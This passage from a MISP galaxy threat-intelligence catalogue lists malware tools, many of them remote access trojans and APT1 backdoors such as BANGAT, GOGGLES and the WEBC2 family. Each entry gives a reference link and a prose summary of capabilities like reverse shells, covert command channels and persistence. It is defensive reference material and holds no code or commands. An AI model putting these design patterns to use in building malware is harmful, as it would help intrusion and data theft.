  • similar: misp-galaxy:malpedia="DarkRat" with estimative-language:likelihood-probability="almost-certain"

Table 16413. Table References

Links

https://github.com/kevthehermit/RATDecoders

gh0st

Remote Access Trojan

The tag is: misp-galaxy:tool="gh0st"

gh0st has relationships with:

  • similar: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="likely"

Table 16414. Table References

Links

https://github.com/kevthehermit/RATDecoders

greame

Remote Access Trojan

The tag is: misp-galaxy:tool="greame"

Table 16415. Table References

Links

https://github.com/kevthehermit/RATDecoders

hawkeye

Remote Access Trojan

The tag is: misp-galaxy:tool="hawkeye"

Table 16416. Table References

Links

https://github.com/kevthehermit/RATDecoders

javadropper

Remote Access Trojan

The tag is: misp-galaxy:tool="javadropper"

Table 16417. Table References

Links

https://github.com/kevthehermit/RATDecoders

lostdoor

Remote Access Trojan

The tag is: misp-galaxy:tool="lostdoor"

Table 16418. Table References

Links

https://github.com/kevthehermit/RATDecoders

luxnet

Remote Access Trojan

The tag is: misp-galaxy:tool="luxnet"

Table 16419. Table References

Links

https://github.com/kevthehermit/RATDecoders

pandora

Remote Access Trojan

The tag is: misp-galaxy:tool="pandora"

pandora has relationships with:

  • similar: misp-galaxy:malpedia="Pandora" with estimative-language:likelihood-probability="almost-certain"

Table 16420. Table References

Links

https://github.com/kevthehermit/RATDecoders

poisonivy

Remote Access Trojan

The tag is: misp-galaxy:tool="poisonivy"

poisonivy has relationships with:

  • similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

Table 16421. Table References

Links

https://github.com/kevthehermit/RATDecoders

predatorpain

Remote Access Trojan

The tag is: misp-galaxy:tool="predatorpain"

Table 16422. Table References

Links

https://github.com/kevthehermit/RATDecoders

punisher

Remote Access Trojan

The tag is: misp-galaxy:tool="punisher"

Table 16423. Table References

Links

https://github.com/kevthehermit/RATDecoders

qrat

Remote Access Trojan

The tag is: misp-galaxy:tool="qrat"

qrat has relationships with:

  • similar: misp-galaxy:rat="Qarallax" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="QRat" with estimative-language:likelihood-probability="almost-certain"

Table 16424. Table References

Links

https://github.com/kevthehermit/RATDecoders

shadowtech

Remote Access Trojan

The tag is: misp-galaxy:tool="shadowtech"

Table 16425. Table References

Links

https://github.com/kevthehermit/RATDecoders

smallnet

Remote Access Trojan

The tag is: misp-galaxy:tool="smallnet"

Table 16426. Table References

Links

https://github.com/kevthehermit/RATDecoders

spygate

Remote Access Trojan

The tag is: misp-galaxy:tool="spygate"

Table 16427. Table References

Links

https://github.com/kevthehermit/RATDecoders

template

Remote Access Trojan

The tag is: misp-galaxy:tool="template"

Table 16428. Table References

Links

https://github.com/kevthehermit/RATDecoders

tapaoux

Remote Access Trojan

The tag is: misp-galaxy:tool="tapaoux"

tapaoux has relationships with:

  • similar: misp-galaxy:malpedia="Tapaoux" with estimative-language:likelihood-probability="almost-certain"

Table 16429. Table References

Links

https://github.com/kevthehermit/RATDecoders

vantom

Remote Access Trojan

The tag is: misp-galaxy:tool="vantom"

Table 16430. Table References

Links

https://github.com/kevthehermit/RATDecoders

virusrat

Remote Access Trojan

The tag is: misp-galaxy:tool="virusrat"

Table 16431. Table References

Links

https://github.com/kevthehermit/RATDecoders

xena

Remote Access Trojan

The tag is: misp-galaxy:tool="xena"

Table 16432. Table References

Links

https://github.com/kevthehermit/RATDecoders

xtreme

Remote Access Trojan

The tag is: misp-galaxy:tool="xtreme"

Table 16433. Table References

Links

https://github.com/kevthehermit/RATDecoders

darkddoser

Remote Access Trojan

The tag is: misp-galaxy:tool="darkddoser"

Table 16434. Table References

Links

https://github.com/kevthehermit/RATDecoders

jspy

Remote Access Trojan

The tag is: misp-galaxy:tool="jspy"

jspy has relationships with:

  • similar: misp-galaxy:malpedia="jSpy" with estimative-language:likelihood-probability="almost-certain"

Table 16435. Table References

Links

https://github.com/kevthehermit/RATDecoders

xrat

Remote Access Trojan

The tag is: misp-galaxy:tool="xrat"

xrat has relationships with:

  • similar: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="almost-certain"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="xRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="XRat" with estimative-language:likelihood-probability="likely"

Table 16436. Table References

Links

https://github.com/kevthehermit/RATDecoders

PupyRAT

Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in Python.

The tag is: misp-galaxy:tool="PupyRAT"

Table 16437. Table References

Links

https://github.com/n1nj4sec/pupy

ELF_IMEIJ

Linux Arm malware spread via RFIs in cgi-bin scripts. This backdoor executes commands from a remote malicious user, effectively compromising the affected system. It connects to a website to send and receive information.

The tag is: misp-galaxy:tool="ELF_IMEIJ"

Table 16438. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/elf_imeij.a

KHRAT

KHRAT is a small backdoor that has three exports (functions), namely, K1, K2, and K3. K1 checks if the current user is an administrator. If not, it uninstalls itself by calling the K2 function.

The tag is: misp-galaxy:tool="KHRAT"

KHRAT has relationships with:

  • similar: misp-galaxy:malpedia="KHRAT" with estimative-language:likelihood-probability="likely"

Table 16439. Table References

Links

https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor

Trochilus

The Trochilus RAT is a threatening RAT (Remote Access Trojan) that may evade many anti-virus programs. The Trochilus RAT is currently being used as part of an extended threat campaign in South East Asia. The first appearance of the Trochilus RAT in this campaign, which has been active since August 2015, was detected in the summer of 2015. The Trochilus RAT is currently being used against civil society organizations and government computers in the South East Asia region, particularly in attacks directed towards the government of Myanmar.

The tag is: misp-galaxy:tool="Trochilus"

Trochilus has relationships with:

  • similar: misp-galaxy:rat="Trochilus" with estimative-language:likelihood-probability="likely"

Table 16440. Table References

Links

http://www.enigmasoftware.com/trochilusrat-removal/

MoonWind

The MoonWind sample used for this analysis was compiled with a Chinese compiler known as BlackMoon, the same compiler used for the BlackMoon banking Trojan. While a number of attributes match the BlackMoon banking Trojan, the malware is not the same. Both malware families were simply compiled using the same compiler, and it was the BlackMoon artifacts that resulted in the naming of the BlackMoon banking Trojan. But because this new sample is different from the BlackMoon banking Trojan,

The tag is: misp-galaxy:tool="MoonWind"

MoonWind has relationships with:

  • similar: misp-galaxy:rat="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="MoonWind - S0149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"

Table 16441. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

Chrysaor

Chrysaor is spyware believed to be created by NSO Group Technologies, specializing in the creation and sale of software and infrastructure for targeted attacks. Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout.

The tag is: misp-galaxy:tool="Chrysaor"

Chrysaor is also known as:

  • Pegasus

  • Pegasus spyware

Chrysaor has relationships with:

  • similar: misp-galaxy:mitre-malware="Pegasus for iOS - S0289" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Pegasus for Android - S0316" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"

Table 16442. Table References

Links

https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

Sathurbot

The trojan serves as a backdoor. It can be controlled remotely.

The tag is: misp-galaxy:tool="Sathurbot"

Sathurbot has relationships with:

  • similar: misp-galaxy:malpedia="Sathurbot" with estimative-language:likelihood-probability="likely"

Table 16443. Table References

Links

http://virusradar.com/en/Win32_Sathurbot.A/description

https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/

AURIGA

The AURIGA malware family shares a large amount of functionality with the BANGAT backdoor. The malware family contains functionality for keystroke logging, creating and killing processes, performing file system and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. The AURIGA malware contains a driver component which is used to inject the malware DLL into other processes. This driver can also perform process and IP connection hiding. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.

The tag is: misp-galaxy:tool="AURIGA"

AURIGA has relationships with:

  • similar: misp-galaxy:malpedia="Auriga" with estimative-language:likelihood-probability="almost-certain"

Table 16444. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

BANGAT

The BANGAT malware family shares a large amount of functionality with the AURIGA backdoor. The malware family contains functionality for keylogging, creating and killing processes, performing filesystem and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. In addition, the malware also implements a custom VNC-like protocol which sends screenshots of the desktop to the C2 server and accepts keyboard and mouse input. The malware communicates to its C2 servers using SSL, with self-signed SSL certificates. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.

The tag is: misp-galaxy:tool="BANGAT"

BANGAT has relationships with:

  • similar: misp-galaxy:malpedia="bangat" with estimative-language:likelihood-probability="almost-certain"

Table 16445. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

BISCUIT

BISCUIT provides attackers with full access to an infected host. BISCUIT capabilities include launching an interactive command shell, enumerating servers on a Windows network, enumerating and manipulating processes, and transferring files. BISCUIT communicates using a custom protocol, which is then encrypted using SSL. Once installed, BISCUIT will attempt to beacon to its command/control servers approximately every 10 or 30 minutes. It will beacon its primary server first, followed by a secondary server. All communication is encrypted with SSL (OpenSSL 0.9.8i).

The tag is: misp-galaxy:tool="BISCUIT"

BISCUIT has relationships with:

  • similar: misp-galaxy:mitre-malware="BISCUIT - S0017" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Biscuit" with estimative-language:likelihood-probability="almost-certain"

Table 16446. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

BOUNCER

BOUNCER will load an extracted DLL into memory, and then will call the DLL’s dump export. The dump export is called with the parameters passed via the command line to the BOUNCER executable. It requires at least two arguments, the IP and port to send the password dump information. It can accept at most five arguments, including a proxy IP, port and an x.509 key for SSL authentication. The DLL backdoor has the capability to execute arbitrary commands, collect database and server information, brute force SQL login credentials, launch arbitrary programs, create processes and threads, delete files, and redirect network traffic.

The tag is: misp-galaxy:tool="BOUNCER"

BOUNCER has relationships with:

  • similar: misp-galaxy:malpedia="Bouncer" with estimative-language:likelihood-probability="almost-certain"

Table 16447. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

CALENDAR

This family of malware uses Google Calendar to retrieve commands and send results. It retrieves event feeds associated with Google Calendar, where each event contains commands from the attacker for the malware to perform. Results are posted back to the event feed. The malware authenticates with Google using the hard-coded email address and passwords. The malware uses the deprecated ClientLogin authentication API from Google. The malware is registered as a service DLL as a persistence mechanism. Artifacts of this may be found in the registry.

The tag is: misp-galaxy:tool="CALENDAR"

CALENDAR has relationships with:

  • similar: misp-galaxy:mitre-malware="CALENDAR - S0025" with estimative-language:likelihood-probability="likely"

Table 16448. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

COMBOS

The COMBOS malware family is an HTTP-based backdoor. The backdoor is capable of file upload, file download, spawning an interactive reverse shell, and terminating its own process. The backdoor may decrypt stored Internet Explorer credentials from the local system and transmit the credentials to the C2 server. The COMBOS malware family does not have any persistence mechanisms built into itself.

The tag is: misp-galaxy:tool="COMBOS"

COMBOS has relationships with:

  • similar: misp-galaxy:malpedia="Combos" with estimative-language:likelihood-probability="almost-certain"

Table 16449. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

COOKIEBAG

This family of malware is a backdoor capable of file upload and download as well as providing remote interactive shell access to the compromised machine. Communication with the Command & Control (C2) servers uses a combination of single-byte XOR and Base64 encoded data in the Cookie and Set-Cookie HTTP header fields. Communication with the C2 servers is over port 80. Some variants install a registry key as a persistence mechanism. The hardcoded strings cited include a string of a command in common with several other APT1 families.

The tag is: misp-galaxy:tool="COOKIEBAG"

COOKIEBAG is also known as:

  • TROJAN.COOKIES

COOKIEBAG has relationships with:

  • similar: misp-galaxy:malpedia="CookieBag" with estimative-language:likelihood-probability="almost-certain"

Table 16450. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

DAIRY

Members of this malware family are backdoors that provide file downloading, process listing, process killing, and reverse shell capabilities. This malware may also add itself to the Authorized Applications list for the Windows Firewall.

The tag is: misp-galaxy:tool="DAIRY"

DAIRY has relationships with:

  • similar: misp-galaxy:malpedia="Dairy" with estimative-language:likelihood-probability="almost-certain"

Table 16451. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GETMAIL

Members of this family of malware are utilities designed to extract email messages and attachments from Outlook PST files. One part of this utility set is an executable, one is a DLL. The malware may create a registry artifact related to the executable.

The tag is: misp-galaxy:tool="GETMAIL"

GETMAIL has relationships with:

  • similar: misp-galaxy:malpedia="GetMail" with estimative-language:likelihood-probability="almost-certain"

Table 16452. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GDOCUPLOAD

This family of malware is a utility designed to upload files to Google Docs. Nearly all communications with docs.google.com are SSL encrypted. The malware does not use Google’s published API to interact with their services. The malware does not currently work with Google Docs. It does not detect HTTP 302 redirections and will get caught in an infinite loop attempting to parse results from Google that are not present.

The tag is: misp-galaxy:tool="GDOCUPLOAD"

Table 16453. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GLOOXMAIL

GLOOXMAIL communicates with Google’s Jabber/XMPP servers and authenticates with a hard-coded username and password. The malware can accept commands over XMPP that include file upload and download, providing a remote shell, sending process listings, and terminating specified processes. The malware makes extensive use of the open source gloox library (http://camaya.net/gloox/, version 0.9.9.12) to communicate using the Jabber/XMPP protocol. All communications with the Google XMPP server are encrypted.

The tag is: misp-galaxy:tool="GLOOXMAIL"

GLOOXMAIL is also known as:

  • TROJAN.GTALK

GLOOXMAIL has relationships with:

  • similar: misp-galaxy:mitre-malware="GLOOXMAIL - S0026" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="GlooxMail" with estimative-language:likelihood-probability="almost-certain"

Table 16454. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GOGGLES

A family of downloader malware, that retrieves an encoded payload from a fixed location, usually in the form of a file with the .jpg extension. Some variants have just an .exe that acts as a downloader, others have an .exe launcher that runs as a service and then loads an associated .dll of the same name that acts as the downloader. This IOC is targeted at the downloaders only. After downloading the file, the malware decodes the downloaded payload into an .exe file and launches it. The malware usually stages the files it uses in the %TEMP% directory or the %WINDIR%\Temp directory.

The tag is: misp-galaxy:tool="GOGGLES"

GOGGLES is also known as:

  • TROJAN.FOXY

GOGGLES has relationships with:

  • similar: misp-galaxy:malpedia="Goggles" with estimative-language:likelihood-probability="almost-certain"

Table 16455. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

GREENCAT

Members of this family are full-featured backdoors that communicate with a Web-based Command & Control (C2) server over SSL. Features include an interactive shell, gathering system info, uploading and downloading files, and creating and killing processes. Malware in this family usually communicates with a hard-coded domain using SSL on port 443. Some members of this family rely on launchers to establish a persistence mechanism for them. Others contain functionality that allows them to install themselves, replacing an existing Windows service, and to uninstall themselves. Several variants use %SystemRoot%\Tasks or %WinDir%\Tasks as working directories; additional malware artifacts may be found there.

The tag is: misp-galaxy:tool="GREENCAT"

Table 16456. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

HACKFASE

This family of malware is a backdoor that provides reverse shell, process creation, system statistics collection, process enumeration, and process termination capabilities. This family is designed to be a service DLL and does not contain an installation mechanism. It usually communicates over port 443. Some variants use their own encryption, others use SSL.

The tag is: misp-galaxy:tool="HACKFASE"

Table 16457. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

HELAUTO

This family of malware is designed to operate as a service and provides remote command execution and file transfer capabilities to a fixed IP address or domain name. All communication with the C2 server happens over port 443 using SSL. This family can be installed as a service DLL. Some variants allow for uninstallation.

The tag is: misp-galaxy:tool="HELAUTO"

HELAUTO has relationships with:

  • similar: misp-galaxy:malpedia="Helauto" with estimative-language:likelihood-probability="almost-certain"

Table 16458. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

KURTON

This family of malware is a backdoor that tunnels its connection through a preconfigured proxy. The malware communicates with a remote command and control server over HTTPS via the proxy. The malware installs itself as a Windows service with a service name supplied by the attacker but defaults to IPRIP if no service name is provided during install.

The tag is: misp-galaxy:tool="KURTON"

KURTON has relationships with:

  • similar: misp-galaxy:malpedia="Kurton" with estimative-language:likelihood-probability="almost-certain"

Table 16459. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

LIGHTBOLT

LIGHTBOLT is a utility with the ability to perform HTTP GET requests for a list of user-specified URLs. The responses of the HTTP requests are then saved as MHTML files, which are added to encrypted RAR files. LIGHTBOLT has the ability to use software certificates for authentication.

The tag is: misp-galaxy:tool="LIGHTBOLT"

Table 16460. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

LIGHTDART

LIGHTDART is a tool used to access a pre-configured web page that hosts an interface to query a database or data set. The tool then downloads the results of a query against that web page to an encrypted RAR file. This RAR file (1.rar) is renamed and uploaded to an attacker controlled FTP server, or uploaded via an HTTP POST with a .jpg extension. The malware will execute this search once a day. The target webpage usually contains information useful to the attacker, which is updated on a regular basis. Examples of targeted information include weather information or ship coordinates.

The tag is: misp-galaxy:tool="LIGHTDART"

Table 16461. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

LONGRUN

LONGRUN is a backdoor designed to communicate with a hard-coded IP address and provide the attackers with a custom interactive shell. It supports file uploads and downloads, and executing arbitrary commands on the compromised machine. When LONGRUN executes, it first loads configuration data stored as an obfuscated string inside the PE resource section. The distinctive string thequickbrownfxjmpsvalzydg is used as part of the input to the decoding algorithm. When the configuration data string is decoded it is parsed and treated as an IP and port number. The malware then connects to the host and begins interacting with it over a custom protocol.

The tag is: misp-galaxy:tool="LONGRUN"

Table 16462. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

MANITSME

This family of malware will beacon out at random intervals to the remote attacker. The attacker can run programs, execute arbitrary commands, and easily upload and download files. This IOC looks for both the dropper file and the backdoor.

The tag is: misp-galaxy:tool="MANITSME"

MANITSME has relationships with:

  • similar: misp-galaxy:malpedia="ManItsMe" with estimative-language:likelihood-probability="almost-certain"

Table 16463. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

MAPIGET

This malware utility is a set of two files that operate in conjunction to extract email messages and attachments from an Exchange server. In order to operate successfully, these programs require authentication credentials for a user on the Exchange server, and must be run from a machine joined to the domain that has Microsoft Outlook installed (or equivalent software that provides the Microsoft 'Messaging API' (MAPI) service).

The tag is: misp-galaxy:tool="MAPIGET"

MAPIGET has relationships with:

  • similar: misp-galaxy:malpedia="MAPIget" with estimative-language:likelihood-probability="almost-certain"

Table 16464. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html

MINIASP

This family of malware consists of backdoors that attempt to fetch encoded commands over HTTP. The malware is capable of downloading a file, downloading and executing a file, executing arbitrary shell commands, or sleeping a specified interval.

The tag is: misp-galaxy:tool="MINIASP"

MINIASP has relationships with:

  • similar: misp-galaxy:malpedia="MiniASP" with estimative-language:likelihood-probability="almost-certain"

Table 16465. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

NEWSREELS

The NEWSREELS malware family is an HTTP based backdoor. When first started, NEWSREELS decodes two strings from its resources section. These strings are both used as C2 channels, one URL is used as a beacon URL (transmitting) and the second URL is used to get commands (receiving). The NEWSREELS malware family is capable of performing file uploads, downloads, creating processes or creating an interactive reverse shell.

The tag is: misp-galaxy:tool="NEWSREELS"

NEWSREELS has relationships with:

  • similar: misp-galaxy:malpedia="NewsReels" with estimative-language:likelihood-probability="almost-certain"

Table 16466. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

SEASALT

The SEASALT malware family communicates via a custom binary protocol. It is capable of gathering some basic system information, file system manipulation, file upload and download, process creation and termination, and spawning an interactive reverse shell. The malware maintains persistence by installing itself as a service.

The tag is: misp-galaxy:tool="SEASALT"

SEASALT has relationships with:

  • similar: misp-galaxy:malpedia="SeaSalt" with estimative-language:likelihood-probability="almost-certain"

Table 16467. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

STARSYPOUND

STARSYPOUND provides an interactive remote shell over an obfuscated communications channel. When it is first run, it loads a string (from the executable PE resource section) containing the beacon IP address and port. The malware sends the beacon string "(SY)# <HOSTNAME>" to the remote system, where <HOSTNAME> is the hostname of the victim system. The remote host responds with a packet that also begins with the string "(SY)# cmd". This causes the malware to launch a new cmd.exe child process. Further communications are forwarded to the cmd.exe child process to execute. The commands sent to the shell and their responses are obfuscated when sent over the network.

The tag is: misp-galaxy:tool="STARSYPOUND"

STARSYPOUND has relationships with:

  • similar: misp-galaxy:malpedia="StarsyPound" with estimative-language:likelihood-probability="almost-certain"

Table 16468. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

SWORD

This family of malware provides a backdoor over the network to the attackers. It is configured to connect to a single host and offers file download over HTTP, program execution, and arbitrary execution of commands through a cmd.exe instance.

The tag is: misp-galaxy:tool="SWORD"

SWORD has relationships with:

  • similar: misp-galaxy:malpedia="Sword" with estimative-language:likelihood-probability="almost-certain"

Table 16469. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

TABMSGSQL

This malware family is a full-featured backdoor capable of file uploading and downloading, arbitrary execution of programs, and providing a remote interactive command shell. All communications with the C2 server are sent over HTTP to a static URL, appending various URL parameters to the request. Some variants use a slightly different URL.

The tag is: misp-galaxy:tool="TABMSGSQL"

TABMSGSQL is also known as:

  • TROJAN LETSGO

TABMSGSQL has relationships with:

  • similar: misp-galaxy:malpedia="TabMsgSQL" with estimative-language:likelihood-probability="almost-certain"

Table 16470. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

TARSIP-ECLIPSE

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS name resolves to a specific address. The capabilities of TARSIP backdoors include file uploading, file downloading, interactive command shells, process enumeration, process creation and process termination. The TARSIP-ECLIPSE family is distinguished by the presence of 'eclipse' in the .pdb debug strings present in the malware samples. It does not provide a built-in mechanism to maintain persistence.

The tag is: misp-galaxy:tool="TARSIP-ECLIPSE"

Table 16471. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

TARSIP-MOON

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS name resolves to a specific address. The capabilities of TARSIP backdoors include file uploading, file downloading, interactive command shells, process enumeration, process creation and process termination. The TARSIP-MOON family is distinguished by the presence of 'moon' in the .pdb debug strings present in the malware samples. It does not provide a built-in mechanism to maintain persistence.

The tag is: misp-galaxy:tool="TARSIP-MOON"

Table 16472. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WARP

The WARP malware family is an HTTP based backdoor written in C++, and the majority of its code base is borrowed from source code available in the public domain. Network communications are implemented using the same WWW client library (w3c.cpp) available from www.dankrusi.com/file_69653F3336383837.html. The malware has system survey functionality (collects hostname, current user, system uptime, CPU speed, etc.) taken directly from the BO2K backdoor available from www.bo2k.com. It also contains the hard disk identification code found at www.winsim.com/diskid32/diskid32.cpp. When WARP executes remote commands, the malware creates a copy of the '%SYSTEMROOT%\system32\cmd.exe' file as '%USERPROFILE%\Temp\~ISUN32.EXE'. The version signature information of the duplicate executable is zeroed out. Some WARP variants maintain persistence through the use of DLL search order hijacking.

The tag is: misp-galaxy:tool="WARP"

Table 16473. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-ADSPACE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is capable of downloading and executing a file. All variants represented here are functionally the same file, differing only in their MD5 hashes. This malware attempts to contact its C2 once a week (Thursday at 10:00 AM). It looks for commands inside a specific set of HTML tags.

The tag is: misp-galaxy:tool="WEBC2-ADSPACE"

WEBC2-ADSPACE has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-AdSpace" with estimative-language:likelihood-probability="almost-certain"

Table 16474. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-AUSOV

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware family is only a downloader which operates over HTTP with a hard-coded URL. If directed, it has the capability to download, decompress, and execute compressed binaries.

The tag is: misp-galaxy:tool="WEBC2-AUSOV"

WEBC2-AUSOV has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Ausov" with estimative-language:likelihood-probability="almost-certain"

Table 16475. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-BOLID

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism.

The tag is: misp-galaxy:tool="WEBC2-BOLID"

WEBC2-BOLID has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Bolid" with estimative-language:likelihood-probability="almost-certain"

Table 16476. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-CLOVER

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware provides the attacker with an interactive command shell, the ability to upload and download files, execute commands on the system, list processes and DLLs, kill processes, and ping hosts on the local network. Responses to these commands are encrypted and compressed before being POSTed to the server. Some variants copy cmd.exe to Updatasched.exe in a temporary directory and launch that copy as a process when an interactive shell is requested. On initial invocation, the malware also attempts to delete previous copies of the Updatasched.exe file.

The tag is: misp-galaxy:tool="WEBC2-CLOVER"

Table 16477. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-CSON

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware act only as downloaders and droppers for other malware. They communicate with a hard-coded C2 server, reading commands embedded in HTML comment fields. Some variants are executables which act upon execution, others are DLLs which can be attached to services or loaded through search order hijacking.

The tag is: misp-galaxy:tool="WEBC2-CSON"

WEBC2-CSON has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Cson" with estimative-language:likelihood-probability="almost-certain"

Table 16478. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-DIV

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-DIV variant searches for the strings "div safe:" and " balance" to delimit encoded C2 information. If the decoded string begins with the letter "J" the malware will parse additional arguments in the decoded string to specify the sleep interval to use. WEBC2-DIV is capable of downloading a file, downloading and executing a file, or sleeping a specified interval.

The tag is: misp-galaxy:tool="WEBC2-DIV"

WEBC2-DIV has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-DIV" with estimative-language:likelihood-probability="almost-certain"

Table 16479. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-GREENCAT

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware is a variant on the GREENCAT family, using a fixed web C2. This family is a full featured backdoor which provides remote command execution, file transfer, process and service enumeration and manipulation. It installs itself persistently through the current user’s registry Run key.

The tag is: misp-galaxy:tool="WEBC2-GREENCAT"

WEBC2-GREENCAT has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-GreenCat" with estimative-language:likelihood-probability="almost-certain"

Table 16480. Table References

Links

